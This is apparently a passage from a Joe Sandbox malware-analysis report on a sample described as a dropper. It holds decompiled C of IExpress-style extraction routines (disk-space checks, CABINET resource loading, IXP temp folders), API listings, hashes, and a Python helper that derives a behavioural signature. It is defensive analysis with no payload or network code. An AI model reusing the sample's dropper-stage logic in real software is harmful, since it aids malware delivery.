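339->344 343->344 347 fd5ada-fd5ae0 343->347 349 fd5ae7-fd5af8 344->349 350 fd5ae6 344->350 347->339
347->344 353 fd5af9-fd5afb 349->353 350->349 354 fd5c04 351->354 355 fd5afd-fd5b03 353->355
356 fd5b05-fd5b08 353->356 354->345 355->353 355->356 357 fd5b0a-fd5b1b call fd44b9 356->357
358 fd5b20-fd5b27 356->358 357->351 359 fd5b29-fd5b33 358->359 360 fd5b52-fd5b5b 358->360 359->360
363 fd5b35-fd5b50 359->363 364 fd5b62-fd5b6d 360->364 363->364 365 fd5b6f-fd5b74 364->365
366 fd5b76-fd5b7d 364->366 367 fd5b85 365->367 368 fd5b7f-fd5b81 366->368 369 fd5b83 366->369
370 fd5b87-fd5b94 call fd268b 367->370 371 fd5b96-fd5b9f 367->371 368->367 369->367 370->354 371->354"""

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")   # "fd597d-fd59b9" or "fd5c02"


@dataclass
class Block:
    bid: int
    start: int
    end: int
    calls: List[str] = field(default_factory=list)   # APIs and "call <addr>" helpers


def parse_cfg(text: str) -> Tuple[Dict[int, Block], List[Tuple[int, int]]]:
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a Joe Sandbox control_flow_graph line")
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    cur: Optional[Block] = None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:                                        # "src->dst"
            edges.append((int(m[1]), int(m[2])))
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            lo, _, hi = tokens[i + 1].partition("-")  # new block "<id> <start>[-<end>]"
            cur = Block(int(tok), int(lo, 16), int(hi or lo, 16))
            blocks[cur.bid] = cur
            i += 1
        elif tok == "call":                          # internal helper, e.g. "call fd44b9"
            cur.calls.append("call " + tokens[i + 1])
            i += 1
        else:                                        # an imported API named in this block
            cur.calls.append(tok)
        i += 1
    return blocks, edges


# Assumption of this example: a block is an error handler if it formats an
# error message or calls the helpers the API listing shows wrapping
# GetLastError (00FD6285) and MessageBoxA (00FD44B9).
ERROR_MARKERS = {"FormatMessageA", "GetLastError", "call fd44b9", "call fd6285"}


def is_error_block(b: Block) -> bool:
    return any(c in ERROR_MARKERS for c in b.calls)


def error_blocks(blocks: Dict[int, Block]) -> List[int]:
    return sorted(b.bid for b in blocks.values() if is_error_block(b))


def success_blocks(blocks: Dict[int, Block], edges, entry: int) -> Set[int]:
    """Blocks reachable from entry without passing through an error block."""
    succ: Dict[int, List[int]] = {}
    for s, d in edges:
        succ.setdefault(s, []).append(d)
    seen: Set[int] = set()
    stack = [entry]
    while stack:
        b = stack.pop()
        if b in seen or is_error_block(blocks[b]):
            continue
        seen.add(b)
        stack.extend(succ.get(b, []))
    return seen


def success_api_sequence(blocks, edges, entry: Optional[int] = None) -> List[str]:
    """Imported APIs on the success path in address order; helper calls omitted."""
    if entry is None:
        entry = next(iter(blocks))                   # first block listed is the entry
    seq: List[str] = []
    for bid in sorted(success_blocks(blocks, edges, entry), key=lambda k: blocks[k].start):
        seq.extend(c for c in blocks[bid].calls if not c.startswith("call "))
    return seq


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_TEXT)
    print("error blocks:", error_blocks(blocks))
    print("success path:", " -> ".join(success_api_sequence(blocks, edges)))
```

The success path comes out as GetCurrentDirectoryA, SetCurrentDirectoryA, GetDiskFreeSpaceA, MulDiv, GetVolumeInformationA, SetCurrentDirectoryA, which is the API order a behavioural signature for this stage of the dropper should expect; the five error blocks (326, 328, 334, 337, 357) are the ones that would only show up in a trace when the target volume is missing or full.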
C-Code - Quality: 96%
			E00FD597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xfd8004; // 0x42de454f (stack cookie seed)
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				/* save the current directory (MAX_PATH = 0x104) and switch to the directory passed in ecx */
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					/* out params, in order: sectors per cluster, bytes per sector, free clusters, total clusters (root path NULL = current drive) */
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						/* error path: format the last Win32 error as text (FORMAT_MESSAGE_FROM_SYSTEM = 0x1000) and report it */
						memset( &_v788, 0, 0x200);
						 *0xfd9124 = E00FD6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E00FD44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					/* bytes per cluster, then free space in KiB = bytesPerCluster * freeClusters / 1024 */
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					/* only the maximum component length (_v820) and the file-system flags (_v816) are requested */
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						/* copy up to 6 characters of the directory string into _v16 */
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						/* find n (0..7) with 512 << n == bytesPerCluster; n indexes a table at 0xfd89e0 below */
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xfd9a34 & 0x00000008;
							if(( *0xfd9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xfd9a38; // 0x0
								_t110 =  *((intOrPtr*)(0xfd89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								/* compare the required size(s) selected by the mode bits in edx against free KiB (_t116) */
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xfd9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E00FD268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							/* 0x8000 is FILE_VOLUME_IS_COMPRESSED in the GetVolumeInformation flags */
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
                                                                                                                                                                                                    							_t105 =  *0xfd9a38; // 0x0
                                                                                                                                                                                                    							_t110 =  *((intOrPtr*)(0xfd89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xfd89e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                    							_t103 = (_t105 >> 2) +  *0xfd9a38;
                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t110 = 0x4c5;
                                                                                                                                                                                                    						E00FD44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						goto L31;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                    					 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                    					_t110 = 0x4f9;
                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t110 = 0x4bc;
                                                                                                                                                                                                    					E00FD44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    					_t66 = 0;
                                                                                                                                                                                                    					L33:
                                                                                                                                                                                                    					return E00FD6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
0x00fd597d
0x00fd5988
0x00fd598f
0x00fd599a
0x00fd59a6
0x00fd59a8
0x00fd59af
0x00fd59b9
0x00fd59dd
0x00fd59e4
0x00fd59f1
0x00fd59fe
0x00fd5a0b
0x00fd5a13
0x00fd5a19
0x00fd5a1b
0x00fd5ba1
0x00fd5baf
0x00fd5bbd
0x00fd5bd8
0x00fd5bde
0x00fd5be3
0x00fd5bec
0x00fd5bf0
0x00fd5bfc
0x00fd5c02
0x00fd5c02
0x00fd5c02
0x00fd5c04
0x00fd5c04
0x00000000
0x00fd5c04
0x00fd5a27
0x00fd5a3a
0x00fd5a46
0x00fd5a48
0x00fd5a4a
0x00000000
0x00000000
0x00fd5a64
0x00fd5a6a
0x00fd5a6c
0x00fd5abc
0x00fd5ac2
0x00fd5ac9
0x00fd5aca
0x00fd5aca
0x00fd5acc
0x00fd5acc
0x00fd5acf
0x00fd5ad1
0x00000000
0x00000000
0x00fd5ad3
0x00fd5ad6
0x00fd5ad8
0x00000000
0x00000000
0x00fd5ada
0x00fd5adc
0x00fd5add
0x00fd5add
0x00fd5ae0
0x00000000
0x00000000
0x00000000
0x00fd5ae0
0x00fd5ae2
0x00fd5ae4
0x00fd5ae6
0x00fd5ae6
0x00fd5ae6
0x00fd5ae9
0x00fd5aeb
0x00fd5af0
0x00fd5af6
0x00fd5af8
0x00fd5af9
0x00fd5af9
0x00fd5afb
0x00000000
0x00000000
0x00fd5afd
0x00fd5aff
0x00fd5b00
0x00fd5b03
0x00000000
0x00000000
0x00000000
0x00fd5b03
0x00fd5b05
0x00fd5b08
0x00fd5b20
0x00fd5b27
0x00fd5b52
0x00fd5b52
0x00fd5b5b
0x00fd5b62
0x00fd5b6b
0x00fd5b6d
0x00fd5b76
0x00fd5b7d
0x00fd5b83
0x00fd5b7f
0x00fd5b7f
0x00fd5b7f
0x00fd5b6f
0x00fd5b72
0x00fd5b72
0x00fd5b85
0x00fd5b98
0x00fd5b9e
0x00fd5b87
0x00fd5b8f
0x00fd5b8f
0x00000000
0x00fd5b85
0x00fd5b29
0x00fd5b33
0x00000000
0x00000000
0x00fd5b35
0x00fd5b48
0x00fd5b4a
0x00000000
0x00fd5b4a
0x00fd5b0f
0x00fd5b16
0x00000000
                                                                                                                                                                                                    0x00fd5b16
                                                                                                                                                                                                    0x00fd5a7c
                                                                                                                                                                                                    0x00fd5a8a
                                                                                                                                                                                                    0x00fd5aa5
                                                                                                                                                                                                    0x00fd5aab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd59bb
                                                                                                                                                                                                    0x00fd59c0
                                                                                                                                                                                                    0x00fd59c7
                                                                                                                                                                                                    0x00fd59d1
                                                                                                                                                                                                    0x00fd59d6
                                                                                                                                                                                                    0x00fd5c05
                                                                                                                                                                                                    0x00fd5c14
                                                                                                                                                                                                    0x00fd5c14

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00FD59A8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 00FD59AF
                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00FD5A13
                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00FD5A40
                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00FD5A64
                                                                                                                                                                                                    • memset.MSVCRT ref: 00FD5A7C
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00FD5A98
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00FD5AA5
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00FD5BFC
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                      • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                    • Opcode ID: ec4e7f489df4a41b7ca9717f267e732155485ff91dde4a5ef37d4df55c4bf6d5
                                                                                                                                                                                                    • Instruction ID: 94df0fecef74460bedaaf203c662e79ef9df88a44d227b992e71a6fb72e19863
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec4e7f489df4a41b7ca9717f267e732155485ff91dde4a5ef37d4df55c4bf6d5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4471B2B190121CAFEB15DB74CC85FFA77AEEB88750F0841ABF405D6240DA749E85AB24
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    control_flow_graph 374 fd4fe0-fd501a call fd468f FindResourceA LoadResource LockResource 377 fd5161-fd5163 374->377 378 fd5020-fd5027 374->378 379 fd5029-fd5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 fd5057-fd505e call fd4efd 378->380 379->380 383 fd507c-fd50b4 380->383 384 fd5060-fd5077 call fd44b9 380->384 389 fd50e8-fd5104 call fd44b9 383->389 390 fd50b6-fd50da 383->390 388 fd5107-fd510e 384->388 392 fd511d-fd511f 388->392 393 fd5110-fd5117 FreeResource 388->393 399 fd5106 389->399 398 fd50dc 390->398 390->399 396 fd513a-fd5141 392->396 397 fd5121-fd5127 392->397 393->392 401 fd515f 396->401 402 fd5143-fd514a 396->402 397->396 400 fd5129-fd5135 call fd44b9 397->400 405 fd50e3-fd50e6 398->405 399->388 400->396 401->377 402->401 403 fd514c-fd5159 SendMessageA 402->403 403->401 405->389 405->399
                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                    			E00FD4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				struct HWND__* _t9;
                                                                                                                                                                                                    				int _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                    				struct HWND__* _t27;
                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				CHAR* _t36;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __edi;
                                                                                                                                                                                                    				_t36 = "CABINET";
                                                                                                                                                                                                    				 *0xfd9144 = E00FD468F(_t36, 0, 0);
                                                                                                                                                                                                    				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                    				 *0xfd9140 = _t8;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					return _t8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t9 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    				if(_t9 != 0) {
                                                                                                                                                                                                    					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                    					ShowWindow(GetDlgItem( *0xfd8584, 0x841), 5); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t10 = E00FD4EFD(0, 0); // executed
                                                                                                                                                                                                    				if(_t10 != 0) {
                                                                                                                                                                                                    					__imp__#20(E00FD4CA0, E00FD4CC0, E00FD4980, E00FD4A50, E00FD4AD0, E00FD4B60, E00FD4BC0, 1, 0xfd9148, _t33);
                                                                                                                                                                                                    					_t34 = _t10;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						_t29 =  *0xfd9148; // 0x0
                                                                                                                                                                                                    						_t24 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    						E00FD44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__#22(_t34, "*MEMCAB", 0xfd1140, 0, E00FD4CD0, 0, 0xfd9140); // executed
                                                                                                                                                                                                    					_t37 = _t10;
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__#23(_t34); // executed
                                                                                                                                                                                                    					if(_t10 != 0) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    					E00FD44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_t12 =  *0xfd9140; // 0x0
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						FreeResource(_t12);
                                                                                                                                                                                                    						 *0xfd9140 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						_t47 =  *0xfd91d8; // 0x0
                                                                                                                                                                                                    						if(_t47 == 0) {
                                                                                                                                                                                                    							E00FD44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(( *0xfd8a38 & 0x00000001) == 0 && ( *0xfd9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                    						SendMessageA( *0xfd8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t37;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00FD4FFE
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00FD5006
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00FD500D
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00FD5030
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00FD5037
                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 00FD504A
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00FD5051
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00FD5111
                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00FD5159
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                    • Opcode ID: 290437734e140b0822ae6cd5150d40ac5b1c0319c2bf4f5d3c2886e64f0c961d
                                                                                                                                                                                                    • Instruction ID: c9ddc02f4ed5ce84fa6029fd9f6eafba9d688fd57d6cab3ba4c5cd89c68a1715
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 290437734e140b0822ae6cd5150d40ac5b1c0319c2bf4f5d3c2886e64f0c961d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1231FA71A4231A7BD7105BB1EC8EF27376FA744BA5F0C0017F90192391DAB8DC40B655
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E00FD53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                                    				CHAR* _t20;
                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				CHAR* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t5 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                    				_t32 = __edx;
                                                                                                                                                                                                    				_t20 = __ecx;
                                                                                                                                                                                                    				_t29 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					E00FD171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                    					_t34 = _t34 + 0x10;
                                                                                                                                                                                                    					_t29 = _t29 + 1;
                                                                                                                                                                                                    					E00FD1680(_t32, 0x104, _t20);
                                                                                                                                                                                                    					E00FD658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                    					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                    					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                    					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t29 < 0x190) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t30 = 0;
                                                                                                                                                                                                    					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                    						_t30 = 1;
                                                                                                                                                                                                    						DeleteFileA(_t32);
                                                                                                                                                                                                    						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return E00FD6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t30 = 1;
                                                                                                                                                                                                    				 *0xfd8a20 = 1;
                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD171E: _vsnprintf.MSVCRT ref: 00FD1750
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD53FB
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5402
                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD541F
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD542B
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5434
                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5452
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
